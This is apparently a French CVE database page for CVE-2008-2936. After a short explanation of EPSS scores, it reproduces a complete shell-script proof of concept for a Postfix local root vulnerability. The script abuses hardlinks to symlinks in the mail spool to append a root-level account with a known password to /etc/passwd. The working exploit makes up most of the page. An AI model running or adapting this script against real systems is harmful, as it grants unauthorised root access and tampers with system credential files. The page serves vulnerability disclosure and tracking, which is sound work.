CVE-2008-2936 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#!/bin/sh # # "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936) # by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com> # # Tested: Ubuntu / Debian # # [ Madrid, 30.Aug.2008 ] # # Config writable_dir=/tmp spool_dir=/var/mail # Use "postconf mail_spool_directory" to obtain this user=root target=/etc/passwd useful_link=/usr/bin/atq # lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at useful_link_dst=at # Tip: find / -type l -uid 0 -print -exec ls -l {} \; | less seconds=3 user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh" # Pass is "dsrrocks" postfix=`which postfix` # /usr/sbin/postfix postconf=/usr/sbin/postconf postmap=/usr/sbin/postmap # Funcs quit() { echo "$1" exit } # Step 1: is my system vulnerable? head -n 9 $0 | tail -n 8 if [ $postfix ] ; then echo "[*] Postfix seems to be installed" else quit "[!] Are you sure Postfix is installed?" fi mkdir -p $writable_dir/pocfix touch $writable_dir/pocfix/src ln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1 ln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2 if [ -L $writable_dir/pocfix/dst2 ] ; then echo "[*] Hardlink to symlink not dereferenced" rm -rf $writable_dir/pocfix else rm -rf $writable_dir/pocfix quit "[!] Hardlink to symlink correctly dereferenced. System is not vulnerable" fi if [ -d $spool_dir -a -w $spool_dir ] ; then echo "[*] Spool dir is writable" else quit "[!] Spool dir is not writable" fi if [ -e $spool_dir/$user ] ; then rm -f $spool_dir/$user echo "[*] Mailbox for \"$user\" found. Trying to delete it" if [ -e $spool_dir/$user ] ; then quit "[!] Couldn't delete it" else echo "[*] Deletion ok" fi fi if [ -e $spool_dir/$useful_link_dst ] ; then rm -f $spool_dir/$useful_link_dst echo "[*] Mailbox for \"$useful_link_dst\" found. Trying to delete it" if [ -e $spool_dir/$useful_link_dst ] ; then quit "[!] Couldn't delete it" else echo "[*] Deletion ok" fi fi aliases=`$postconf alias_database | cut -d"=" -f2` $postconf alias_maps | grep -q $aliases if [ $? -eq 0 ] ; then if [ $aliases ] ; then $postmap -q $user $aliases > /dev/null if [ $? -eq 0 ] ; then quit "[!] Mail alias for \"$user\" exists" fi fi fi lda=`$postconf mailbox_command | cut -d"=" -f2` if [ $lda ] ; then quit "[!] Non-Postfix LDA detected" fi $postconf home_mailbox | grep -q '/$' if [ $? -eq 0 ] ; then quit "[!] Maildir-style mailbox detected" fi # Step 2: Exploiting ln -f $useful_link $spool_dir/$user 2> /dev/null || quit "[!] Couldn't create hardlink (different partitions?)" ln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit "[!] Couldn't create symlink pointing to target file" cp -f $target $writable_dir/pocfix_target_backup.$$ && echo "[*] Backed up: $target (saved as \"$writable_dir/pocfix_target_backup.$$\")" echo "[*] Sending mail ($seconds seconds wait)" echo $user_in_passwd | /usr/sbin/sendmail $user sleep $seconds diff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null if [ $? -eq 0 ] ; then echo "[!] Exploit failed" else echo "[*] Exploit successful (appended data to $target). Now \"su dsr\", pass is \"dsrrocks\")" fi rm -f $spool_dir/$user rm -f $spool_dir/$useful_link_dst # milw0rm.com [2008-08-31]